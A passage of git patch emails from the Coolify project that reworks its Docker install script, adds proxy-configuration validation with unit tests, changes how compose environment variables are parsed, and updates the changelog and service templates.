     echo " - Docker is not installed. Installing Docker. It may take a while."
     getAJoke
     case "$OS_TYPE" in
-    "almalinux")
-        dnf config-manager --add-repo=https://download.docker.com/linux/centos/docker-ce.repo >/dev/null 2>&1
-        dnf install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin >/dev/null 2>&1
-        if ! [ -x "$(command -v docker)" ]; then
-            echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
-            exit 1
-        fi
-        systemctl start docker >/dev/null 2>&1
-        systemctl enable docker >/dev/null 2>&1
-        ;;
     "alpine" | "postmarketos")
         apk add docker docker-cli-compose >/dev/null 2>&1
         rc-update add docker default >/dev/null 2>&1
@@ -569,8 +556,9 @@ if ! [ -x "$(command -v docker)" ]; then
         fi
         ;;
     "arch")
-        pacman -Sy docker docker-compose --noconfirm >/dev/null 2>&1
+        pacman -Syu --noconfirm --needed docker docker-compose >/dev/null 2>&1
         systemctl enable docker.service >/dev/null 2>&1
+        systemctl start docker.service >/dev/null 2>&1
         if ! [ -x "$(command -v docker)" ]; then
             echo " - Failed to install Docker with pacman. Try to install it manually."
             echo "   Please visit https://wiki.archlinux.org/title/docker for more information."
@@ -581,7 +569,7 @@ if ! [ -x "$(command -v docker)" ]; then
         dnf install docker -y >/dev/null 2>&1
         DOCKER_CONFIG=${DOCKER_CONFIG:-/usr/local/lib/docker}
         mkdir -p $DOCKER_CONFIG/cli-plugins >/dev/null 2>&1
-        curl -sL "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o $DOCKER_CONFIG/cli-plugins/docker-compose >/dev/null 2>&1
+        curl -fsSL "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o $DOCKER_CONFIG/cli-plugins/docker-compose >/dev/null 2>&1
         chmod +x $DOCKER_CONFIG/cli-plugins/docker-compose >/dev/null 2>&1
         systemctl start docker >/dev/null 2>&1
         systemctl enable docker >/dev/null 2>&1
@@ -591,34 +579,28 @@ if ! [ -x "$(command -v docker)" ]; then
             exit 1
         fi
         ;;
-    "centos" | "fedora" | "rhel" | "tencentos")
-        if [ -x "$(command -v dnf5)" ]; then
-            # dnf5 is available
-            dnf config-manager addrepo --from-repofile=https://download.docker.com/linux/$OS_TYPE/docker-ce.repo --overwrite >/dev/null 2>&1
-        else
-            # dnf5 is not available, use dnf
-            dnf config-manager --add-repo=https://download.docker.com/linux/$OS_TYPE/docker-ce.repo >/dev/null 2>&1
-        fi
+    "almalinux" | "tencentos")
+        dnf config-manager --add-repo=https://download.docker.com/linux/centos/docker-ce.repo >/dev/null 2>&1
         dnf install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin >/dev/null 2>&1
+        systemctl start docker >/dev/null 2>&1
+        systemctl enable docker >/dev/null 2>&1
         if ! [ -x "$(command -v docker)" ]; then
             echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
             exit 1
         fi
-        systemctl start docker >/dev/null 2>&1
-        systemctl enable docker >/dev/null 2>&1
         ;;
-    "ubuntu" | "debian" | "raspbian")
+    "ubuntu" | "debian" | "raspbian" | "centos" | "fedora" | "rhel" | "sles")
         install_docker
         if ! [ -x "$(command -v docker)" ]; then
-            echo " - Automated Docker installation failed. Trying manual installation."
-            install_docker_manually
+            echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
+            exit 1
         fi
         ;;
     *)
         install_docker
         if ! [ -x "$(command -v docker)" ]; then
-            echo " - Automated Docker installation failed. Trying manual installation."
-            install_docker_manually
+            echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
+            exit 1
         fi
         ;;
     esac
@@ -627,6 +609,19 @@ else
     echo " - Docker is installed."
 fi
 
+# Verify minimum Docker version
+MIN_DOCKER_VERSION=24
+INSTALLED_DOCKER_VERSION=$(docker version --format '{{.Server.Version}}' 2>/dev/null | cut -d. -f1)
+if [ -z "$INSTALLED_DOCKER_VERSION" ]; then
+    echo " - WARNING: Could not determine Docker version. Please ensure Docker $MIN_DOCKER_VERSION+ is installed."
+elif [ "$INSTALLED_DOCKER_VERSION" -lt "$MIN_DOCKER_VERSION" ]; then
+    echo " - ERROR: Docker version $INSTALLED_DOCKER_VERSION is too old. Coolify requires Docker $MIN_DOCKER_VERSION or newer."
+    echo "   Please upgrade Docker: https://docs.docker.com/engine/install/"
+    exit 1
+else
+    echo " - Docker version $(docker version --format '{{.Server.Version}}' 2>/dev/null) meets minimum requirement ($MIN_DOCKER_VERSION+)."
+fi
+
 log_section "Step 4/9: Checking Docker configuration"
 echo "4/9 Checking Docker configuration..."
 
diff --git a/scripts/install.sh b/scripts/install.sh
index b014a3d24..2e1dab326 100755
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -20,7 +20,7 @@ DATE=$(date +"%Y%m%d-%H%M%S")
 
 OS_TYPE=$(grep -w "ID" /etc/os-release | cut -d "=" -f 2 | tr -d '"')
 ENV_FILE="/data/coolify/source/.env"
-DOCKER_VERSION="27.0"
+DOCKER_VERSION="latest"
 # TODO: Ask for a user
 CURRENT_USER=$USER
 
@@ -499,13 +499,10 @@ fi
 
 install_docker() {
     set +e
-    curl -s https://releases.rancher.com/install-docker/${DOCKER_VERSION}.sh | sh 2>&1 || true
+    curl -fsSL https://get.docker.com | sh 2>&1 || true
     if ! [ -x "$(command -v docker)" ]; then
-        curl -s https://get.docker.com | sh -s -- --version ${DOCKER_VERSION} 2>&1
-        if ! [ -x "$(command -v docker)" ]; then
-            echo "Automated Docker installation failed. Trying manual installation."
-            install_docker_manually
-        fi
+        echo "Automated Docker installation failed. Trying manual installation."
+        install_docker_manually
     fi
     set -e
 }
@@ -548,16 +545,6 @@ if ! [ -x "$(command -v docker)" ]; then
     echo " - Docker is not installed. Installing Docker. It may take a while."
     getAJoke
     case "$OS_TYPE" in
-    "almalinux")
-        dnf config-manager --add-repo=https://download.docker.com/linux/centos/docker-ce.repo >/dev/null 2>&1
-        dnf install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin >/dev/null 2>&1
-        if ! [ -x "$(command -v docker)" ]; then
-            echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
-            exit 1
-        fi
-        systemctl start docker >/dev/null 2>&1
-        systemctl enable docker >/dev/null 2>&1
-        ;;
     "alpine" | "postmarketos")
         apk add docker docker-cli-compose >/dev/null 2>&1
         rc-update add docker default >/dev/null 2>&1
@@ -569,8 +556,9 @@ if ! [ -x "$(command -v docker)" ]; then
         fi
         ;;
     "arch")
-        pacman -Sy docker docker-compose --noconfirm >/dev/null 2>&1
+        pacman -Syu --noconfirm --needed docker docker-compose >/dev/null 2>&1
         systemctl enable docker.service >/dev/null 2>&1
+        systemctl start docker.service >/dev/null 2>&1
         if ! [ -x "$(command -v docker)" ]; then
             echo " - Failed to install Docker with pacman. Try to install it manually."
             echo "   Please visit https://wiki.archlinux.org/title/docker for more information."
@@ -581,7 +569,7 @@ if ! [ -x "$(command -v docker)" ]; then
         dnf install docker -y >/dev/null 2>&1
         DOCKER_CONFIG=${DOCKER_CONFIG:-/usr/local/lib/docker}
         mkdir -p $DOCKER_CONFIG/cli-plugins >/dev/null 2>&1
-        curl -sL "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o $DOCKER_CONFIG/cli-plugins/docker-compose >/dev/null 2>&1
+        curl -fsSL "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o $DOCKER_CONFIG/cli-plugins/docker-compose >/dev/null 2>&1
         chmod +x $DOCKER_CONFIG/cli-plugins/docker-compose >/dev/null 2>&1
         systemctl start docker >/dev/null 2>&1
         systemctl enable docker >/dev/null 2>&1
@@ -591,34 +579,28 @@ if ! [ -x "$(command -v docker)" ]; then
             exit 1
         fi
         ;;
-    "centos" | "fedora" | "rhel" | "tencentos")
-        if [ -x "$(command -v dnf5)" ]; then
-            # dnf5 is available
-            dnf config-manager addrepo --from-repofile=https://download.docker.com/linux/$OS_TYPE/docker-ce.repo --overwrite >/dev/null 2>&1
-        else
-            # dnf5 is not available, use dnf
-            dnf config-manager --add-repo=https://download.docker.com/linux/$OS_TYPE/docker-ce.repo >/dev/null 2>&1
-        fi
+    "almalinux" | "tencentos")
+        dnf config-manager --add-repo=https://download.docker.com/linux/centos/docker-ce.repo >/dev/null 2>&1
         dnf install -y docker-ce docker-ce-cli containerd.io docker-compose-plugin >/dev/null 2>&1
+        systemctl start docker >/dev/null 2>&1
+        systemctl enable docker >/dev/null 2>&1
         if ! [ -x "$(command -v docker)" ]; then
             echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
             exit 1
         fi
-        systemctl start docker >/dev/null 2>&1
-        systemctl enable docker >/dev/null 2>&1
         ;;
-    "ubuntu" | "debian" | "raspbian")
+    "ubuntu" | "debian" | "raspbian" | "centos" | "fedora" | "rhel" | "sles")
         install_docker
         if ! [ -x "$(command -v docker)" ]; then
-            echo " - Automated Docker installation failed. Trying manual installation."
-            install_docker_manually
+            echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
+            exit 1
         fi
         ;;
     *)
         install_docker
         if ! [ -x "$(command -v docker)" ]; then
-            echo " - Automated Docker installation failed. Trying manual installation."
-            install_docker_manually
+            echo " - Docker could not be installed automatically. Please visit https://docs.docker.com/engine/install/ and install Docker manually to continue."
+            exit 1
         fi
         ;;
     esac
@@ -627,6 +609,19 @@ else
     echo " - Docker is installed."
 fi
 
+# Verify minimum Docker version
+MIN_DOCKER_VERSION=24
+INSTALLED_DOCKER_VERSION=$(docker version --format '{{.Server.Version}}' 2>/dev/null | cut -d. -f1)
+if [ -z "$INSTALLED_DOCKER_VERSION" ]; then
+    echo " - WARNING: Could not determine Docker version. Please ensure Docker $MIN_DOCKER_VERSION+ is installed."
+elif [ "$INSTALLED_DOCKER_VERSION" -lt "$MIN_DOCKER_VERSION" ]; then
+    echo " - ERROR: Docker version $INSTALLED_DOCKER_VERSION is too old. Coolify requires Docker $MIN_DOCKER_VERSION or newer."
+    echo "   Please upgrade Docker: https://docs.docker.com/engine/install/"
+    exit 1
+else
+    echo " - Docker version $(docker version --format '{{.Server.Version}}' 2>/dev/null) meets minimum requirement ($MIN_DOCKER_VERSION+)."
+fi
+
 log_section "Step 4/9: Checking Docker configuration"
 echo "4/9 Checking Docker configuration..."
 

From 9db06444f316d5ac4c33f489f3d32ebe01d8f975 Mon Sep 17 00:00:00 2001
From: "github-actions[bot]" <github-actions[bot]@users.noreply.github.com>
Date: Tue, 24 Mar 2026 19:18:36 +0000
Subject: [PATCH 120/213] docs: update changelog

---
 CHANGELOG.md | 55 ++++++++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 55 insertions(+)

diff --git a/CHANGELOG.md b/CHANGELOG.md
index 999af79b8..8cd7287f3 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1288,6 +1288,20 @@ ### 🚀 Features
 - *(templates)* Add imgcompress service, for offline image processing (#8763)
 - *(service)* Add librespeed (#8626)
 - *(service)* Update databasus to v3.16.2 (#8586)
+- *(preview)* Add configurable PR suffix toggle for volumes
+- *(api)* Add storages endpoints for applications
+- *(api)* Expand update_storage to support name, mount_path, host_path, content fields
+- *(environment-variable)* Add placeholder hint for magic variables
+- *(subscription)* Display next billing date and billing interval
+- *(api)* Support comments in bulk environment variable endpoints
+- *(api)* Add database environment variable management endpoints
+- *(storage)* Add resources tab and improve S3 deletion handling
+- *(storage)* Group backups by database and filter by s3 status
+- *(storage)* Add storage management for backup schedules
+- *(jobs)* Add cache-based deduplication for delayed cron execution
+- *(storage)* Add storage endpoints and UUID support for databases and services
+- *(monitoring)* Add Laravel Nightwatch monitoring support
+- *(validation)* Make hostname validation case-insensitive and expand allowed characters
 
 ### 🐛 Bug Fixes
 
@@ -4687,6 +4701,29 @@ ### 🐛 Bug Fixes
 - *(compose)* Include git branch in compose file not found error
 - *(template)* Fix heyform template
 - *(template)* Fix heyform template (#8747)
+- *(preview)* Exclude bind mounts from preview deployment suffix
+- *(preview)* Sync isPreviewSuffixEnabled property on file storage save
+- *(storages)* Hide PR suffix for services and fix instantSave logic
+- *(preview)* Enable per-volume control of PR suffix in preview deployments (#9006)
+- Prevent sporadic SSH permission denied by validating key content
+- *(ssh)* Handle chmod failures gracefully and simplify key management
+- Prevent sporadic SSH permission denied on key rotation (#8990)
+- *(stripe)* Add error handling and resilience to subscription operations
+- *(stripe)* Add error handling and resilience to subscription operations (#9030)
+- *(api)* Extract resource UUIDs from route parameters
+- *(backup)* Throw explicit error when S3 storage missing or deleted (#9038)
+- *(docker)* Skip cleanup stale warning on cloud instances
+- *(deployment)* Disable build server during restart operations
+- *(deployment)* Disable build server during restart operations (#9045)
+- *(docker)* Log failed cleanup attempts when server is not functional
+- *(environment-variable)* Guard refresh against missing or stale variables
+- *(github-webhook)* Handle unsupported event types gracefully
+- *(github-webhook)* Handle unsupported event types gracefully (#9119)
+- *(deployment)* Properly escape shell arguments in nixpacks commands
+- *(deployment)* Properly escape shell arguments in nixpacks commands (#9122)
+- *(validation)* Make hostname validation case-insensitive and expand allowed name characters (#9134)
+- *(team)* Resolve server limit checks for API token authentication (#9123)
+- *(subscription)* Prevent duplicate subscriptions with updateOrCreate
 
 ### 💼 Other
 
@@ -5791,6 +5828,13 @@ ### 🚜 Refactor
 - *(application-source)* Use Laravel helpers for null checks
 - *(ssh)* Remove Sentry retry event tracking from ExecuteRemoteCommand
 - Consolidate file path validation patterns and support scoped packages
+- *(environment-variable)* Remove buildtime/runtime options and improve comment field
+- Remove verbose logging and use explicit exception types
+- *(breadcrumb)* Optimize queries and simplify state management
+- *(scheduler)* Extract cron scheduling logic to shared helper
+- *(team)* Make server limit methods accept optional team parameter
+- *(team)* Update serverOverflow to use static serverLimit
+- *(docker)* Simplify installation and remove version pinning
 
 ### 📚 Documentation
 
@@ -5944,6 +5988,10 @@ ### 📚 Documentation
 - *(readme)* Move MVPS to Huge Sponsors section
 - *(settings)* Clarify Do Not Track helper text
 - Update changelog
+- Update changelog
+- *(sponsors)* Add ScreenshotOne as a huge sponsor
+- *(sponsors)* Update Brand.dev to Context.dev
+- *(readme)* Add PetroSky Cloud to sponsors
 
 ### ⚡ Performance
 
@@ -5954,6 +6002,7 @@ ### ⚡ Performance
 - Remove dead server filtering code from Kernel scheduler (#7585)
 - *(server)* Optimize destinationsByServer query
 - *(server)* Optimize destinationsByServer query (#7854)
+- *(breadcrumb)* Optimize queries and simplify navigation to fix OOM (#9048)
 
 ### 🎨 Styling
 
@@ -5966,6 +6015,7 @@ ### 🎨 Styling
 - *(campfire)* Format environment variables for better readability in Docker Compose file
 - *(campfire)* Update comment for DISABLE_SSL environment variable for clarity
 - Update background colors to use gray-50 for consistency in auth views
+- *(modal-confirmation)* Improve mobile responsiveness
 
 ### 🧪 Testing
 
@@ -5989,6 +6039,7 @@ ### 🧪 Testing
 - *(rollback)* Verify shell metacharacter escaping in git commit parameter
 - *(factories)* Add missing model factories for app test suite
 - *(magic-variables)* Add feature tests for SERVICE_URL/FQDN variable handling
+- Add behavioral ssh key stale-file regression
 
 ### ⚙️ Miscellaneous Tasks
 
@@ -6786,6 +6837,10 @@ ### ⚙️ Miscellaneous Tasks
 - *(service)* Pin imgcompress to a static version instead of latest
 - *(service)* Update SeaweedFS images to version 4.13 (#8738)
 - *(templates)* Bump databasus image version
+- Remove coolify-examples-1 submodule
+- *(versions)* Bump coolify, sentinel, and traefik versions
+- *(versions)* Bump sentinel to 0.0.21
+- *(service)* Disable Booklore service (#9105)
 
 ### ◀️ Revert
 

From b8e52c6a45bbeb87037f8c40544e3207cef1db9c Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 21:32:34 +0100
Subject: [PATCH 121/213] feat(proxy): validate stored config matches current
 proxy type

Add validation in GetProxyConfiguration to detect when stored proxy config
belongs to a different proxy type (e.g., Traefik config on a Caddy server)
and trigger regeneration with a warning log. Clear cached proxy configuration
and settings when proxy type is changed to prevent stale configs from being
reused. Includes tests verifying config rejection on type mismatch and
graceful fallback on invalid YAML.
---
 app/Actions/Proxy/GetProxyConfiguration.php | 36 +++++++++++
 app/Models/Server.php                       |  3 +
 tests/Unit/ProxyConfigRecoveryTest.php      | 70 ++++++++++++++++++++-
 3 files changed, 106 insertions(+), 3 deletions(-)

diff --git a/app/Actions/Proxy/GetProxyConfiguration.php b/app/Actions/Proxy/GetProxyConfiguration.php
index de44b476f..159f12252 100644
--- a/app/Actions/Proxy/GetProxyConfiguration.php
+++ b/app/Actions/Proxy/GetProxyConfiguration.php
@@ -2,10 +2,12 @@
 
 namespace App\Actions\Proxy;
 
+use App\Enums\ProxyTypes;
 use App\Models\Server;
 use App\Services\ProxyDashboardCacheService;
 use Illuminate\Support\Facades\Log;
 use Lorisleiva\Actions\Concerns\AsAction;
+use Symfony\Component\Yaml\Yaml;
 
 class GetProxyConfiguration
 {
@@ -24,6 +26,17 @@ public function handle(Server $server, bool $forceRegenerate = false): string
             // Primary source: database
             $proxy_configuration = $server->proxy->get('last_saved_proxy_configuration');
 
+            // Validate stored config matches current proxy type
+            if (! empty(trim($proxy_configuration ?? ''))) {
+                if (! $this->configMatchesProxyType($proxyType, $proxy_configuration)) {
+                    Log::warning('Stored proxy config does not match current proxy type, will regenerate', [
+                        'server_id' => $server->id,
+                        'proxy_type' => $proxyType,
+                    ]);
+                    $proxy_configuration = null;
+                }
+            }
+
             // Backfill: existing servers may not have DB config yet — read from disk once
             if (empty(trim($proxy_configuration ?? ''))) {
                 $proxy_configuration = $this->backfillFromDisk($server);
@@ -55,6 +68,29 @@ public function handle(Server $server, bool $forceRegenerate = false): string
         return $proxy_configuration;
     }
 
+    /**
+     * Check that the stored docker-compose YAML contains the expected service
+     * for the server's current proxy type. Returns false if the config belongs
+     * to a different proxy type (e.g. Traefik config on a CADDY server).
+     */
+    private function configMatchesProxyType(string $proxyType, string $configuration): bool
+    {
+        try {
+            $yaml = Yaml::parse($configuration);
+            $services = data_get($yaml, 'services', []);
+
+            return match ($proxyType) {
+                ProxyTypes::TRAEFIK->value => isset($services['traefik']),
+                ProxyTypes::CADDY->value => isset($services['caddy']),
+                ProxyTypes::NGINX->value => isset($services['nginx']),
+                default => true,
+            };
+        } catch (\Throwable $e) {
+            // If YAML is unparseable, don't block — let the existing flow handle it
+            return true;
+        }
+    }
+
     /**
      * Backfill: read config from disk for servers that predate DB storage.
      * Stores the result in the database so future reads skip SSH entirely.
diff --git a/app/Models/Server.php b/app/Models/Server.php
index 527c744a5..ce877bd20 100644
--- a/app/Models/Server.php
+++ b/app/Models/Server.php
@@ -1471,6 +1471,9 @@ public function changeProxy(string $proxyType, bool $async = true)
         if ($validProxyTypes->contains(str($proxyType)->lower())) {
             $this->proxy->set('type', str($proxyType)->upper());
             $this->proxy->set('status', 'exited');
+            $this->proxy->set('last_saved_proxy_configuration', null);
+            $this->proxy->set('last_saved_settings', null);
+            $this->proxy->set('last_applied_settings', null);
             $this->save();
             if ($this->proxySet()) {
                 if ($async) {
diff --git a/tests/Unit/ProxyConfigRecoveryTest.php b/tests/Unit/ProxyConfigRecoveryTest.php
index 219ec9bca..e10d899fe 100644
--- a/tests/Unit/ProxyConfigRecoveryTest.php
+++ b/tests/Unit/ProxyConfigRecoveryTest.php
@@ -10,20 +10,26 @@
     Cache::spy();
 });
 
-function mockServerWithDbConfig(?string $savedConfig): object
+function mockServerWithDbConfig(?string $savedConfig, string $proxyType = 'TRAEFIK'): object
 {
     $proxyAttributes = Mockery::mock(SchemalessAttributes::class);
     $proxyAttributes->shouldReceive('get')
         ->with('last_saved_proxy_configuration')
         ->andReturn($savedConfig);
 
+    $proxyPath = match ($proxyType) {
+        'CADDY' => '/data/coolify/proxy/caddy',
+        'NGINX' => '/data/coolify/proxy/nginx',
+        default => '/data/coolify/proxy/',
+    };
+
     $server = Mockery::mock('App\Models\Server');
     $server->shouldIgnoreMissing();
     $server->shouldReceive('getAttribute')->with('proxy')->andReturn($proxyAttributes);
     $server->shouldReceive('getAttribute')->with('id')->andReturn(1);
     $server->shouldReceive('getAttribute')->with('name')->andReturn('Test Server');
-    $server->shouldReceive('proxyType')->andReturn('TRAEFIK');
-    $server->shouldReceive('proxyPath')->andReturn('/data/coolify/proxy');
+    $server->shouldReceive('proxyType')->andReturn($proxyType);
+    $server->shouldReceive('proxyPath')->andReturn($proxyPath);
 
     return $server;
 }
@@ -107,3 +113,61 @@ function mockServerWithDbConfig(?string $savedConfig): object
 
     expect($result)->toBe($savedConfig);
 });
+
+it('rejects stored Traefik config when proxy type is CADDY', function () {
+    Log::swap(new \Illuminate\Log\LogManager(app()));
+    Log::spy();
+
+    $traefikConfig = "services:\n  traefik:\n    image: traefik:v3.6\n";
+    $server = mockServerWithDbConfig($traefikConfig, 'CADDY');
+
+    // Config type mismatch should trigger regeneration, which will try
+    // backfillFromDisk (instant_remote_process) then generateDefault.
+    // Both will fail in test env, but the warning log proves mismatch was detected.
+    try {
+        GetProxyConfiguration::run($server);
+    } catch (\Throwable $e) {
+        // Expected — regeneration requires SSH/full server setup
+    }
+
+    Log::shouldHaveReceived('warning')
+        ->withArgs(fn ($message) => str_contains($message, 'does not match current proxy type'))
+        ->once();
+});
+
+it('rejects stored Caddy config when proxy type is TRAEFIK', function () {
+    Log::swap(new \Illuminate\Log\LogManager(app()));
+    Log::spy();
+
+    $caddyConfig = "services:\n  caddy:\n    image: lucaslorentz/caddy-docker-proxy:2.8-alpine\n";
+    $server = mockServerWithDbConfig($caddyConfig, 'TRAEFIK');
+
+    try {
+        GetProxyConfiguration::run($server);
+    } catch (\Throwable $e) {
+        // Expected — regeneration requires SSH/full server setup
+    }
+
+    Log::shouldHaveReceived('warning')
+        ->withArgs(fn ($message) => str_contains($message, 'does not match current proxy type'))
+        ->once();
+});
+
+it('accepts stored Caddy config when proxy type is CADDY', function () {
+    $caddyConfig = "services:\n  caddy:\n    image: lucaslorentz/caddy-docker-proxy:2.8-alpine\n";
+    $server = mockServerWithDbConfig($caddyConfig, 'CADDY');
+
+    $result = GetProxyConfiguration::run($server);
+
+    expect($result)->toBe($caddyConfig);
+});
+
+it('accepts stored config when YAML parsing fails', function () {
+    $invalidYaml = "this: is: not: [valid yaml: {{{}}}";
+    $server = mockServerWithDbConfig($invalidYaml, 'TRAEFIK');
+
+    // Invalid YAML should not block — configMatchesProxyType returns true on parse failure
+    $result = GetProxyConfiguration::run($server);
+
+    expect($result)->toBe($invalidYaml);
+});

From 6a14a12a58a6df09dd5d48f6e48ed71b58ac7e35 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 24 Mar 2026 21:52:36 +0100
Subject: [PATCH 122/213] fix(parsers): preserve ${VAR} references in compose
 instead of resolving to DB values

Do not replace self-referencing environment variables (e.g., DATABASE_URL: ${DATABASE_URL})
with saved DB values in the compose environment section. Keeping the reference intact allows
Docker Compose to resolve from .env at deploy time, preventing stale values from overriding
user updates that haven't been re-parsed.

Fixes #9136
---
 bootstrap/helpers/parsers.php                 | 18 +++++-----
 templates/service-templates-latest.json       | 34 +++++++++----------
 templates/service-templates.json              | 34 +++++++++----------
 .../ServiceParserEnvVarPreservationTest.php   | 20 +++++------
 4 files changed, 54 insertions(+), 52 deletions(-)

diff --git a/bootstrap/helpers/parsers.php b/bootstrap/helpers/parsers.php
index cd4928d63..4ca693fcb 100644
--- a/bootstrap/helpers/parsers.php
+++ b/bootstrap/helpers/parsers.php
@@ -990,16 +990,17 @@ function applicationParser(Application $resource, int $pull_request_id = 0, ?int
             }
             if ($key->value() === $parsedValue->value()) {
                 // Simple variable reference (e.g. DATABASE_URL: ${DATABASE_URL})
-                // Use firstOrCreate to avoid overwriting user-saved values on redeploy
-                $envVar = $resource->environment_variables()->firstOrCreate([
+                // Ensure the variable exists in DB for .env generation and UI display
+                $resource->environment_variables()->firstOrCreate([
                     'key' => $key,
                     'resourceable_type' => get_class($resource),
                     'resourceable_id' => $resource->id,
                 ], [
                     'is_preview' => false,
                 ]);
-                // Add the variable to the environment using the saved DB value
-                $environment[$key->value()] = $envVar->value;
+                // Keep the ${VAR} reference in compose — Docker Compose resolves from .env at deploy time.
+                // Do NOT replace with DB value: if user updates env var without re-parsing compose,
+                // a stale resolved value in environment: would override the correct .env value.
             } else {
                 if ($value->startsWith('$')) {
                     $isRequired = false;
@@ -2341,8 +2342,8 @@ function serviceParser(Service $resource): Collection
             }
             if ($key->value() === $parsedValue->value()) {
                 // Simple variable reference (e.g. DATABASE_URL: ${DATABASE_URL})
-                // Use firstOrCreate to avoid overwriting user-saved values on redeploy
-                $envVar = $resource->environment_variables()->firstOrCreate([
+                // Ensure the variable exists in DB for .env generation and UI display
+                $resource->environment_variables()->firstOrCreate([
                     'key' => $key,
                     'resourceable_type' => get_class($resource),
                     'resourceable_id' => $resource->id,
@@ -2350,8 +2351,9 @@ function serviceParser(Service $resource): Collection
                     'is_preview' => false,
                     'comment' => $envComments[$originalKey] ?? null,
                 ]);
-                // Add the variable to the environment using the saved DB value
-                $environment[$key->value()] = $envVar->value;
+                // Keep the ${VAR} reference in compose — Docker Compose resolves from .env at deploy time.
+                // Do NOT replace with DB value: if user updates env var without re-parsing compose,
+                // a stale resolved value in environment: would override the correct .env value.
             } else {
                 if ($value->startsWith('$')) {
                     $isRequired = false;
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index f22a2ab53..51cb39de0 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -310,23 +310,6 @@
         "minversion": "0.0.0",
         "port": "3000"
     },
-    "booklore": {
-        "documentation": "https://booklore.org/docs/getting-started?utm_source=coolify.io",
-        "slogan": "Booklore is an open-source library management system for your digital book collection.",
-        "compose": "c2VydmljZXM6CiAgYm9va2xvcmU6CiAgICBpbWFnZTogJ2Jvb2tsb3JlL2Jvb2tsb3JlOnYxLjE2LjUnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9CT09LTE9SRV84MAogICAgICAtICdVU0VSX0lEPSR7Qk9PS0xPUkVfVVNFUl9JRDotMH0nCiAgICAgIC0gJ0dST1VQX0lEPSR7Qk9PS0xPUkVfR1JPVVBfSUQ6LTB9JwogICAgICAtICdUWj0ke1RaOi1VVEN9JwogICAgICAtICdEQVRBQkFTRV9VUkw9amRiYzptYXJpYWRiOi8vbWFyaWFkYjozMzA2LyR7TUFSSUFEQl9EQVRBQkFTRTotYm9va2xvcmUtZGJ9JwogICAgICAtICdEQVRBQkFTRV9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9NQVJJQURCfScKICAgICAgLSAnREFUQUJBU0VfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01BUklBREJ9JwogICAgICAtIEJPT0tMT1JFX1BPUlQ9ODAKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Jvb2tsb3JlLWRhdGE6L2FwcC9kYXRhJwogICAgICAtICdib29rbG9yZS1ib29rczovYm9va3MnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiB+L2Jvb2tsb3JlCiAgICAgICAgdGFyZ2V0OiAvYm9va2Ryb3AKICAgICAgICBpc19kaXJlY3Rvcnk6IHRydWUKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnd2dldCAtLW5vLXZlcmJvc2UgLS10cmllcz0xIC0tc3BpZGVyIGh0dHA6Ly9sb2NhbGhvc3QvbG9naW4gfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBtYXJpYWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMicKICAgIGVudmlyb25tZW50OgogICAgICAtICdNQVJJQURCX1VTRVI9JHtTRVJWSUNFX1VTRVJfTUFSSUFEQn0nCiAgICAgIC0gJ01BUklBREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01BUklBREJ9JwogICAgICAtICdNQVJJQURCX1JPT1RfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX01BUklBREJST09UfScKICAgICAgLSAnTUFSSUFEQl9EQVRBQkFTRT0ke01BUklBREJfREFUQUJBU0U6LWJvb2tsb3JlLWRifScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ21hcmlhZGItZGF0YTovdmFyL2xpYi9teXNxbCcKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBoZWFsdGhjaGVjay5zaAogICAgICAgIC0gJy0tY29ubmVjdCcKICAgICAgICAtICctLWlubm9kYl9pbml0aWFsaXplZCcKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiAxMAo=",
-        "tags": [
-            "media",
-            "books",
-            "kobo",
-            "epub",
-            "ebook",
-            "koreader"
-        ],
-        "category": null,
-        "logo": "svgs/booklore.svg",
-        "minversion": "0.0.0",
-        "port": "80"
-    },
     "bookstack": {
         "documentation": "https://www.bookstackapp.com/docs/?utm_source=coolify.io",
         "slogan": "BookStack is a simple, self-hosted, easy-to-use platform for organising and storing information",
